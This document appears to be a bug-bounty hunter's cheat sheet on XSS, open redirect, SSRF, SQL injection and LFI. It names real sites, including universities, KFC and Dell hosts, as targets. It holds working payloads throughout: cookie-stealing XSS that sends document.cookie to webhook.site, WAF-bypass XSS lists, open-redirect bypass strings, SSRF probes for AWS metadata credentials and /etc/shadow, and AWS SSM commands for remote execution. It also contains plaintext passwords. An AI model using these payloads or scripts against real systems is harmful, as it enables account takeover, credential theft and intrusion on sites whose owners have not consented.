🇵🇰XSS & Open Redirect
🔥 Regex-based endpoint analysis (heuristic greps — verify every hit by hand)
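# ---------------------------------------------------------------------------
# Regex triage of a URL/response dump (default: wayback.txt, or pass a file
# as $1). Each section prints a banner, the unique hits and a "Total ..." count.
#
# Everything here is a HEURISTIC: a 13-16 digit run is not necessarily a card
# number (no Luhn check), a 32+ char alnum run is not necessarily a session id,
# and "Suspicious Strings" matches ordinary long path segments. Treat hits as
# leads to verify by hand. When it does work the output holds live JWTs and
# tokens, so keep it out of tickets, chat and version control.
# ---------------------------------------------------------------------------

# RFC 4122 style UUID (version nibble 1-5, variant nibble 8/9/a/b)
readonly UUID_RE='[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[1-5][0-9a-fA-F]{3}-[89abAB][0-9a-fA-F]{3}-[0-9a-fA-F]{12}'
# header.payload.signature in base64url; the signature may be empty (alg=none).
# The old class [A-Za-z0-9_\-\.] also swallowed a literal backslash and never
# required the two dots, so JSON-escaped text ran into the match.
readonly JWT_RE='eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*'
# RFC 1918 ranges, all four octets, word-bounded. The old pattern captured
# only three octets for 10/8 and, lacking \b, reported "10.1.2" from "110.1.2.3".
readonly PRIVATE_IP_RE='\b(10\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])|192\.168)\.[0-9]{1,3}\.[0-9]{1,3}\b'
readonly IPV4_RE='\b([0-9]{1,3}\.){3}[0-9]{1,3}\b'

# grep_uniq REGEX FILE — unique extended-regex matches, one per line.
# -a: without it grep prints "Binary file matches" for dumps that contain a
# few non-text bytes (several of the original greps were missing it).
grep_uniq() { grep -aEo -- "$1" "$2" | sort -u; }

(
input=${1:-wayback.txt}
[[ -r "$input" ]] || { printf 'cannot read %s\n' "$input" >&2; exit 1; }

# banner LABEL — section header; plain text when figlet/lolcat are missing
# instead of aborting the run.
banner() {
  if command -v figlet >/dev/null 2>&1 && command -v lolcat >/dev/null 2>&1; then
    figlet -f small -c "$1" | lolcat
  else
    printf '\n== %s ==\n' "$1"
  fi
}

# count LABEL — pass stdin through and report the number of lines seen.
count() { tee >(wc -l | awk -v label="$1" '{print "Total " label ": " $1}'); }

banner "UUIDs";              grep_uniq "$UUID_RE" "$input" | count "UUIDs"
banner "JWT";                grep_uniq "$JWT_RE" "$input" | count "JWTs"
banner "Suspicious Strings"; grep_uniq '[a-zA-Z0-9_-]{20,}' "$input" | count "Suspicious"
banner "Credit Cards";       grep_uniq '\b[0-9]{13,16}\b' "$input" | count "CCs"
banner "SessionIDs";         grep_uniq '[a-zA-Z0-9]{32,}' "$input" | count "SessionIDs"

# keyword sections: whole matching lines, case-insensitive
banner "Tokens & Secrets";   grep -aiE 'token=|token |code=|code |secret=|secret ' "$input" | sort -u | count "Tokens/Secrets"
banner "Credentials";        grep -aiE 'admin|pass(word|wd|wd=)|pwd|passwd|password|mail|phone|mobile|number' "$input" | sort -u | count "Cred-like"

banner "Private IPs";        grep_uniq "$PRIVATE_IP_RE" "$input" | count "Private IPs"
# the one-liner read wayback_domain.com.txt here while every other section read wayback.txt
banner "All IPs";            grep_uniq "$IPV4_RE" "$input" | count "IPs"

banner "Payments";           grep -aiE 'payment|order(id)?|pay(id)?|invoice|receipt' "$input" | sort -u | count "Payments"
banner "Roles";              grep -aiE 'role=|privilege=|=admin' "$input" | sort -u | count "Roles"
banner "API Endpoints";      grep -aiE '/api/|api\.|/graphql|graphql' "$input" | sort -u | count "API Endpoints"
banner "Auth Stuff";         grep -aiE 'sso|/sso|saml|/saml|oauth|/oauth|auth|/auth|callback|/callback' "$input" | sort -u | count "Auth"
)

Subdomains Gathering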
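# ---------------------------------------------------------------------------
# Subdomain enumeration → live-host probing.
# Passive sources (subfinder, assetfinder, findomain, web.archive.org, crt.sh)
# followed by knockpy brute force — the knockpy step is ACTIVE and generates
# traffic against the target's resolvers, so only run it in scope.
# Output files:
#   subdomains.txt            merged, deduplicated hostnames
#   livesubdomains-ports.txt  scheme://host:port of everything that answered
#   livesubdomains.txt        same list with the port stripped and deduped,
#                             because the later steps read it in that form.
#                             (The stripped list no longer tells you WHICH of
#                             the probed ports answered — keep the -ports file.)
# Usage: bash this-file.sh [domain]   (defaults to naturalis.nl)
# ---------------------------------------------------------------------------
domain=${1:-naturalis.nl}

banner() { figlet -f small -c "$1" | lolcat; }

# require TOOL... — fail before starting rather than discovering a missing tool
# halfway through and merging half-empty files.
require() {
  local t
  for t in "$@"; do
    command -v "$t" >/dev/null 2>&1 || { printf 'missing tool: %s\n' "$t" >&2; return 1; }
  done
}

enumerate() {
  require subfinder assetfinder findomain curl jq knockpy httpx-toolkit figlet lolcat || return 1

  banner "Passive: Subfinder"
  subfinder -d "$domain" -all -recursive -t 200 -o subfinder.txt
  banner "Passive: Assetfinder"
  assetfinder --subs-only "$domain" | tee assetfinder.txt
  banner "Passive: Findomain"
  findomain --quiet -t "$domain" -u findomain.txt
  banner "Passive: Web Archive"
  curl -sf --connect-timeout 10 "https://web.archive.org/cdx/search/cdx?url=*.$domain&fl=original&collapse=urlkey" \
    | awk -F/ '{print $3}' | sort -u | tee archive.txt
  banner "Passive: crt.sh"
  # -f: on a crt.sh 5xx the body is HTML and jq would abort with a parse error
  curl -sf --connect-timeout 10 "https://crt.sh/?q=%25.$domain&output=json" \
    | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt.txt
  banner "Active: Knockpy"
  # knockpy prints URLs; strip the scheme so sort -u can dedupe them against
  # the bare hostnames from the passive sources
  knockpy -d "$domain" --recon --bruteforce \
    | grep -oP 'https?://[a-zA-Z0-9.-]+(:[0-9]+)?' | sed -E 's#^https?://##' | tee knockpy.txt
  banner "Sorting Subdomains"
  sort -u knockpy.txt crt.txt archive.txt assetfinder.txt subfinder.txt findomain.txt | tee subdomains.txt
  banner "Probing Live Subs"
  httpx-toolkit -l subdomains.txt -ports 80,443,8080,8000,8888,8881,8889 -threads 200 | tee livesubdomains-ports.txt
  # port-stripped form for the downstream steps; sort -u collapses a host that
  # answered on several ports into one line
  sed 's/:[0-9]\+//g' livesubdomains-ports.txt | sort -u > livesubdomains.txt
  printf '\nLive Subdomains Count: %s\n' "$(wc -l < livesubdomains.txt)" | lolcat
}
enumerate

# ---------------------------------------------------------------------------
# Grep a JS bundle for secret-looking identifiers. The pattern is deliberately
# broad (db, sql, json, config, key, token ...) so expect a lot of noise; it is
# a lead generator, not a finding. Override the URL with JS_URL=...
# ---------------------------------------------------------------------------
js_url=${JS_URL:-http://50.116.35.69:86/index.js}
curl -sL --connect-timeout 10 "$js_url" \
  | grep -i -E "aws_access_key|aws_secret_key|api key|passwd|pwd|heroku|slack|firebase|swagger|aws key|password|ftp password|jdbc|db|sql|secret jet|config|admin|json|gcp|htaccess|\.env|ssh key|\.git|access key|secret token|oauth_token|oauth_token_secret|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private"

site:.worldremit.com intext:"Swagger UI" | intitle:"Swagger UI"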
?url=https://jumpy-floor.surge.sh/test.yaml
https://xss.smarpo.com/test.json
https://jumpy-floor.surge.sh/test.json
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rlogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/ylogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/lw.json
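https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rtest0.json
# ---------------------------------------------------------------------------
# Wayback URL harvest → interesting-file / JS / 403-404 bypass triage.
# Usage: bash this-file.sh [domain]   (defaults to udayton.edu)
# Override TARGET_URL (403 bypass target) and JS_URL (bundle to grep) via env.
# ---------------------------------------------------------------------------
domain=${1:-udayton.edu}
target=${TARGET_URL:-https://target.com/secret}
js_url=${JS_URL:-http://50.116.35.69:86/index.js}

# Interesting extensions, anchored on end of path (or ?/#/ next) so ".db" does
# not also hit ".dbf", ".sh" does not hit ".shtml", ".log" not ".login", etc.
# Fixes vs. the one-liner: ".htaccess" was typed as "\..htaccess" (could never
# match), "\.swp\.old" was one alternative instead of two, ".git" was listed twice.
readonly INTERESTING_EXT_RE='\.(xls|xlsx|json|sql|doc|docx|pptx|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|exe|dll|bin|ini|bat|sh|tar|deb|git|env|rpm|iso|img|apk|msi|dmg|tmp|crt|pem|key|pub|asc|conf|htaccess|htpasswd|pfx|p12|swp|old|temp|dump|passwd|shadow|svn|DS_Store|idea|vscode|bash_history|zsh_history)([?#/]|$)'

# interesting_urls [FILE] — lines of FILE (default data.txt) whose path ends in
# one of the extensions above; case-insensitive.
interesting_urls() { grep -Ei -- "$INTERESTING_EXT_RE" "${1:-data.txt}"; }

# js_urls [FILE] — lines whose path ends in .js. The old `grep js` also matched
# .json, .jsp, "ajax" and anything else containing the two letters.
js_urls() { grep -Ei '\.js([?#]|$)' "${1:-data.txt}"; }

main() {
  local t
  for t in wget httpx nuclei dirsearch curl; do
    command -v "$t" >/dev/null 2>&1 || { printf 'missing tool: %s\n' "$t" >&2; return 1; }
  done

  # full CDX index for *.domain; bounded retries so a dead archive endpoint
  # does not hang the run
  wget --tries=3 --timeout=30 -O data.txt \
    "https://web.archive.org/cdx/search/cdx?url=*.$domain/*&output=text&fl=original&collapse=urlkey&from=" || return 1

  interesting_urls data.txt
  js_urls data.txt | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon

  # hosts that answered 403 → bypass wordlist, then the four 403-bypass.sh modes
  dirsearch -l subdomains_output/403_sub.txt --exclude-status=403 -w 403-ultimate-discovery.txt
  local mode
  for mode in --encode --header --protocol --HTTPmethod; do
    bash 403-bypass.sh -u "$target" "$mode"
  done
  dirsearch -l subdomains_output/404_sub.txt --exclude-status=404 -w 404-ultimate-discovery.txt

  # secret-looking identifiers in a JS bundle (broad and noisy — leads only)
  curl -s --connect-timeout 10 "$js_url" \
    | grep -i -E 'password|pwd|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private'

  # Known-interesting paths. The one-liner chained these with &&, so the first
  # pattern with no hits silently skipped all the following ones.
  grep -- secure data.txt | grep -- jspa
  local pat
  for pat in '/geoserver/ows/' ganglia graph_all_periods.php keycloak '/realms/master' '?id='; do
    grep -F -- "$pat" data.txt
  done
}
main

Open redirects in the login flow mostly have the session token or any other auth token in the query param.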
site:.dv.ue.edu.pk inurl:login | intext:login | intitle:login | inurl:signin | inurl:admin | inurl:dashboard
site:.ue.edu.pk inurl:admin | inurl:dashboard | inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup
'"/><img src=x><a href=https://evil.com>Click
<b>hello</b><h1>hacker</h1><a href=https://evil.com>hacked
<img src="https://static.wikia.nocookie.net/mrbean/images/4/4b/Mr_beans_holiday_ver2.jpg">
<h1>Congratulations you won the cash prize </h1><img src="https://play-lh.googleusercontent.com/ufXzlOQA6bwOibqQ_yBmIFaqBWOl3bbgeffwPV8z3419PWPvHZfx4Vxe98GgQ8Z7mVQ"><a href="https://evil.com"><H1><U><I>Click here to claim your reward
In the name field: /"><img src=x onerror=alert(document.cookie)>
hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123
Server-side redirects always use the Location response header with a 3XX status code. If there is no Location header but the page still redirects (after a short delay), the redirect is DOM-based (client-side JavaScript).
Run open-dork.sh Script
Determine whether the redirect happens server-side (Location header) or client-side (DOM), then exploit accordingly.
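# Server-side redirect check: -I shows the status and Location header, -L
# follows the chain so you see where it finally lands.
curl -sI --connect-timeout 10 "https://opac.nust.edu.pk/cgi-bin/koha/tracklinks.pl?uri=https%3A%2F%2Fwww.elsevier.com%2Fbooks-and-journals%2Fbook-companion%2F9780128038437&biblionumber=591873"
curl -sIL --connect-timeout 10 "http://www.paulsellers.nl/guestbook/go.php?url=https://docs.ultralytics.com/modes/predict/"
# Client-side (DOM) redirect check: no Location header, but the body assigns
# window.location / location.href from the parameter. The one-liner had the
# javascript: payload as a trailing argument, which grep took as a FILE NAME
# and therefore never looked at the curl output.
curl -s --connect-timeout 10 "https://account.cbg.nl/logout?redirect_uri=https://evil.com/" | grep -i -E 'location\.href|window\.location'
javascript:alert(origin)
javascript:alert/**/(origin)
javascript:confirm(origin);//
javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookie
Find XSS Steps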
Check
Subdomains.sh to tech based Filters DomainsCheck
Ext-dork to tech based Filters DomainsCheck
Shodan-dork to tech based Filters Domains
Run
ext-dork.shScriptwith Specific Domaindirsearch -w raft-medium-directories.txt -u https://xyz.example.com -e js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl --full-url --max-rate=5 -i 200feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,php,phtml,inc,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl -w raft-small-directories.txt -u https://www.kfc.co.uk/ -t 10 --rate-limit 5ffuf -u https://www.kfc.co.uk/FUZZ -w common.txt -recursion -recursion-depth 4 -mc 200 -e .js,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.action,.act,.pl -rate 50 -t 50
ffuf -w api-wordlist.txt -u https://target.com/API/v3/FUZZ -mc 200 -H "Content-Type: application/json"
Check hidden paths in robots.txt
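# ---------------------------------------------------------------------------
# robots.txt mining: Disallow entries → directory wordlist (robot-words.txt)
# ---------------------------------------------------------------------------
# disallow_paths — robots.txt text on stdin → each Disallow target with the
# leading "/" removed, one per line. A bare "Disallow:" (allow everything)
# used to produce an empty wordlist entry; it is skipped now.
disallow_paths() {
  grep 'Disallow' | awk '{print $2}' | cut -c 2- | grep -v '^$'
}

# mine_robots — fetch /robots.txt from every live host and collect the paths.
mine_robots() {
  local t url
  for t in httpx-toolkit http anew; do
    command -v "$t" >/dev/null 2>&1 || { printf 'missing tool: %s\n' "$t" >&2; return 1; }
  done
  httpx-toolkit -l livesubdomains.txt -paths /robots.txt -silent -o robots-url.txt || return 1
  # line by line: the old `for url in $(cat ...)` word-split the URLs and
  # glob-expanded any "*" in them
  while IFS= read -r url; do
    [[ -n "$url" ]] || continue
    http -b "$url" | disallow_paths | anew robot-words.txt
  done < robots-url.txt
}
mine_robots

# flag every live host whose robots.txt disallows one specific path
ffuf -u FUZZ/robots.txt -w livesubdomains.txt -mr "/INTERSHOP/"
Run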
hostname:"mytoken.us.dell.com"ShodanRun
host:"mytoken.us.dell.com"Fofanslookup mytoken.us.dell.com
Run
FuzzingwithFFUFRun
FuzzingwithGobusterRun
FuzzingwithDirsearch
Run
ArjunRun
ParamPamPamRun
x8with parameters wordlist
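# ---------------------------------------------------------------------------
# Parameter discovery (arjun) → reflection check (Gxss)
# ---------------------------------------------------------------------------
# param_urls — URLs on stdin; for each query parameter emit "<base>?<name>="
# on its own line so every parameter is probed on its own. The other
# parameters are dropped on purpose; if the page needs them to render, add
# them back by hand. Empty parameters ("a=1&&b=2", trailing "&") are skipped
# instead of producing "<base>?=".
param_urls() {
  awk -F'[?&]' '{
    base = $1
    for (i = 2; i <= NF; i++) {
      if ($i == "") continue
      split($i, kv, "=")
      if (kv[1] != "") print base "?" kv[1] "="
    }
  }'
}

main() {
  local t
  for t in arjun Gxss httpx; do
    command -v "$t" >/dev/null 2>&1 || { printf 'missing tool: %s\n' "$t" >&2; return 1; }
  done
  arjun -i endpoint.txt -oT Arjun.txt || return 1
  param_urls < Arjun.txt | tee xss-check.txt
  # pass 1: which parameters reflect at all
  Gxss < xss-check.txt | httpx -sc
  # pass 2: does an injected tag survive unescaped (HTML injection)
  Gxss -p '">asad<a href=https://bing.com>hacked' < xss-check.txt | tee -a confirm-html-injection.txt
  # pass 3: same marker without a closed tag, as an XSS indicator
  Gxss -p '">asad<hacked' < xss-check.txt | tee -a confirm-xss.txt
}
main

# error-page fingerprint across the live hosts
httpx -l livesubdomains.txt -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc
https://xss.report/dashboard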
swagpk Synack@3434https://bxsshunter.com/dashboard
Synack@3434
'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
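"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>
# ---------------------------------------------------------------------------
# SQLi sweep over the discovered parameter URLs with ghauri.
# "yes n" answers ghauri's interactive prompts so the loop does not stall.
# --level/--risk 3 send aggressive payloads — only where that is in scope.
# ---------------------------------------------------------------------------
while IFS= read -r url; do
  [[ -n "$url" ]] || continue
  printf 'Testing URL: %s\n' "$url"
  yes n | ghauri -u "$url" --dbs --banner --current-db --level 3
done < arjun.txt
# single target (the one-liner had "risk=3" without the dashes, which is not
# the --risk option)
ghauri -u 'https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1' --random-agent -v3 --level=3 --risk=3

# --- Open redirect probes on every parameter URL ----------------------------
qsreplace 'https://%09/evil.com' < xss-check.txt | httpx -status-code -title -location
# same, with the payload wordlist op.txt appended to the emptied parameter
sed 's/=.*/=/' xss-check.txt | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location

# --- LFI probes: the match regex is an /etc/passwd root entry ---------------
printf '%s\n' "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' \
  | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
printf '%s\n' "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u \
  | while IFS= read -r fuzz_url; do
      ffuf -u "$fuzz_url" -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v
    done
---------------------------------------------------------------------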
Open Redirect GET-Based in Register-Login-logout-signup and Reset-Password Page URL
echo 'https://be.elementor.com/visit/?bta=13693&brand=elementor&landingPage=' | httpx -paths op.txt -threads 50 -random-agent -sc -locationhttps://evil.com
https://%09/evil.com
http%3A%2F%2Fwww.google.com
https%3A%2F%2Fwww.google.com%2F
https://www%2Egoogle%2Ecom
https://www%252Egoogle%252Ecom
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
%68%74%74%70%3a%2f%2fevil.com
/%0D/evil%25%32%65com
%40evil.com/
%2F%2Fevil.com
%2F%2F%2F%2Fhackerone.com//evil.com
///evil.com/
////evil.com
/%0d/evil.com
/%09/evil.com
/%0A/evil.com
/%0D/evil.com
/%09/evil.com
/+/evil.com
/\evil.com/
\\evil.com\
/..//evil.com
http:///evil.com/
@www.bing.com
.evil.com
https:evil.com
https;evil.com
https:\/\/evil.com
https:/\/\evil.com
https:\\evil.comtarget.com%40evil.com
https://target.com%5C%5C@google.com/
https://evil.com%5C%40www.example.com
https://target.com@evil.com/
https://target.com/@evil.com
https://evil.com\@target.com
https://target.com.bing.com/
https://target.com?bing.com
https://target.com°bing.com
https://target.com%23bing.com
https://target.com%00bing.com
https://target.com%0Abing.com
https://target.com%0Dbing.com
https://target.com%0Dbing.com
https://target.com%09bing.com
/%0d/evil.com/
https://evil.com\\.target.com/
https://evil.com%E3%80%82%23.target.com/
https://target.com%00https://evil.com/
https://website.com/http://evil.com/
http://evil.com?vimeocdn.com/
https://attacker.com%E3%80%82example.com
?link=https://bing.com?link=https://www.target.com/
?link=https://evil.com/?link=https://open.spreaker.com//https://evil.com
?Redirect=https:/www.target.com/login-redirect/?redirect=//any-domain.comhttps://auth.<company>/?next_url=https://www.<product>/login-redirect/?redirect=//any-domain.com?token=<TOKEN>
https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8DOM XSS Check In Redirect Parameters
javascript:confirm(1);//
java%0d%0ascript%0d%0a:alert(document.domain)
javascript://%250Dtop.confirm?.(origin)//
javascript:%250Aalert(1)//
javascript:@evil.com
java%0D%0Ascript%0D%0A:alert(document.domain)
javascript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
If an access token is present in the redirect URL, check for account takeover — the token travels along to whatever host the redirect lands on.
j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookie
Or confirm with a Burp Collaborator / webhook URL instead of an alert.
SSRF Check In Redirect OR Data Fetch and File Download Parameters
wfuzz -z range,0-65535 -u 'https://www.somaiya.edu.in/download.php?pdf_path=127.0.0.1:FUZZ'python3 ssrfmap.py -r request.txt -p "url" -m readfiles,portscanhttp://[::]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254//latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/
file:///etc/passwd
file:///etc/shadow
file:///etc/shells
file:///etc/group
file:///etc/profile
file:///etc/hosts
file:///proc/self/environ
file:///proc/self/status
file:///proc/mounts
file:///proc/version
file:///bin/sh
file:///C:/Windows/win.ini
file:///web.config
file:///C:/windows/System32/drivers/etc/hosts
cat /e*c/p*s*d
If SSRF is confirmed, check whether it escalates to RCE (e.g. cloud metadata credentials → SSM, as below).
1) Configure AWS CLI
export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=us-west-1
export AWS_SESSION_TOKEN=
2) these Paths can be used to find the region
/latest/meta-data/placement/availability-zone
/latest/dynamic/instance-identity/document
3) aws sts get-caller-identity
4) aws s3 ls
5) aws ssm send-command --document-name "AWS-RunShellScript" --comment "AnyComment" --instance-ids="[Instance-id]" --parameters "commands=uname -a"
Blind XSS Check to Account Takeover
Find Hidden Endpoints FOR Fuzzing
recursion -recursion-depth 4
-rate 50 -t 50
-p 0.5-0.6
-v -mc 200
-v -fc 401,403
-e .html,.htm
-e .php,.html,.htm
-e .asp,.aspx,.html,.htm
-e .jsp,.jspx,.do,.html,.htm,.action
-x "http://127.0.0.1:8080"
-s--exclude-sizes 0B
--recursive
--random-agent
--max-rate=
--full-url
--cookie=
-i 200
-x 401,403
-e html,htm
-e php,html,htm,js
-e asp,aspx,html,htm,js
-e jsp,jspx,do,html,htm,action,js
-e js,php,html,xhtml,htm,asp,aspx,ashx,asmx,cfm,jsp,jspx,do,action,plFind Hidden Parameters
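python3 parampp.py -u https://press.zara.com/ECOMPressSite/error.html
# ---------------------------------------------------------------------------
# Hidden-parameter output (arjun / x8) → per-parameter reflection check
# ---------------------------------------------------------------------------
# param_urls — URLs on stdin → "<base>?<name>=" per query parameter, one per
# line (other parameters dropped on purpose so each is probed alone).
param_urls() {
  awk -F'[?&]' '{
    base = $1
    for (i = 2; i <= NF; i++) {
      if ($i == "") continue
      split($i, kv, "=")
      if (kv[1] != "") print base "?" kv[1] "="
    }
  }'
}

# x8_param_urls — x8 lines look like "GET <url> % p1, p2"; emit "<url>?p1="
# per parameter. Uses split()'s return value instead of length(array), which
# is a gawk-only extension (mawk / busybox awk reject it).
x8_param_urls() {
  awk -F' % ' '{
    base = $1
    sub(/^[A-Z]+ /, "", base)
    n = split($2, params, ", ")
    for (i = 1; i <= n; i++) if (params[i] != "") print base "?" params[i] "="
  }'
}

# check FILE — reflection pass (Gxss) over the parameter URLs in FILE; hits
# with an injected tag are appended to confirm-xss.txt
check() {
  Gxss < "$1" | httpx -sc
  Gxss -p '">asad<a href=https://bing.com>hacked' < "$1" | tee -a confirm-xss.txt
}

main() {
  local t
  for t in Gxss httpx; do
    command -v "$t" >/dev/null 2>&1 || { printf 'missing tool: %s\n' "$t" >&2; return 1; }
  done
  # separate files: the one-liner wrote both lists to xss.txt, so the x8 run
  # overwrote the arjun one before it could be reviewed
  [[ -r arjun.txt ]] && param_urls < arjun.txt | tee xss-arjun.txt && check xss-arjun.txt
  [[ -r x8.txt ]] && x8_param_urls < x8.txt | tee xss-x8.txt && check xss-x8.txt
}
main
-c 500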
-d 2
-t 10 -T 10
--stable
--passive
-m POST
-oT arjun.txt
--disable-redirects
--headers ‘Cookie: PHPSESSID=xxxx’--reflected-only
-X GET
-u
-w
-v
Confirm the vulnerable parameter for HTML injection or reflected XSS
"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
'"><img src=x onerror=confirm(origin)>
"><svg onload=confirm(1)>
(confirm)(origin)
javascript:confirm(document.domain)
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe
### If the site strips keywords from the payload, use these payloads instead:
<a/href=javascript:alert(origin)>ClickMe
"><a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>
Akamai WAF Bypasses...
';k='e'%0Atop['al'+k+'rt'](1)//
'><A HRef=' AutoFocus OnFocus=top//?.['ale'%2B'rt'](1)>
---------------------
CloudFlare WAF Bypasses...
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ev'%2B'al'](`imp\u00%36%66rt\u00%32%38'//X55.is'\u00%32%39`)>
<svg/onload=window['al'+'ert']1337>
<Svg Only=1 OnLoad=confirm(document.cookie)>
<svg onload=alert(document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1//On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Img Src=OnXSS OnError=prompt(1337)>
<Img Src=OnXSS OnError=prompt(document.cookie)>
<Svg Only=1 OnLoad=confirm(atob('Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=='))>
---------------------
Cloudfront WAF Bypasses...
%2522%253E%253Csvg/onload=alert(origin)%253E
'>'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
'>%0D%0A%0D%0A<x '='foo'><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>'>
---------------------
ModSecurity WAF Bypasses...
Payloads designed to evade ModSecurity WAF rules
<svg onload='new Function['Y000!'].find(al\u0065rt)'>
---------------------
Imperva WAF Bypasses...
Advanced techniques for bypassing Imperva WAF protection
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter='location=javas+cript:ale+rt%2+81%2+9;//</div'>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle='propmt(document.cookie);'>
---------------------
Sucuri WAF Bypasses...
<A HREF='https://www.cia.gov/'>Click Here </A>
'><img src=x onerror=alert(document.cookie)>
<button onClick='prompt(1337)'>Submit</button>
<a aa aaa aaaa aaaaaa href=javascript:alert(1337)>ClickMe
<a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href='javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://github.com/coffinxp';'>ClickMe</a>
Find Origin IP to Bypass WAF
hostname:".dell.com" http.component:php
hostname:".dell.com" http.component:java
hostname:".dell.com" http.component:ASP.NET
nslookup mytoken.us.dell.com
https://search.censys.io/
host="mytoken.us.dell.com"
https://en.fofa.info/
domain="mytoken.us.dell.com"
https://www.shodan.io/search
hostname:"mytoken.us.dell.com"
curl -i url | head -n 15
Create and customize the XSS payload according to the WAF and the filtering regex
RXSS to Account Take Over
'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>
If the page takes a GET parameter, also check it for SQL injection


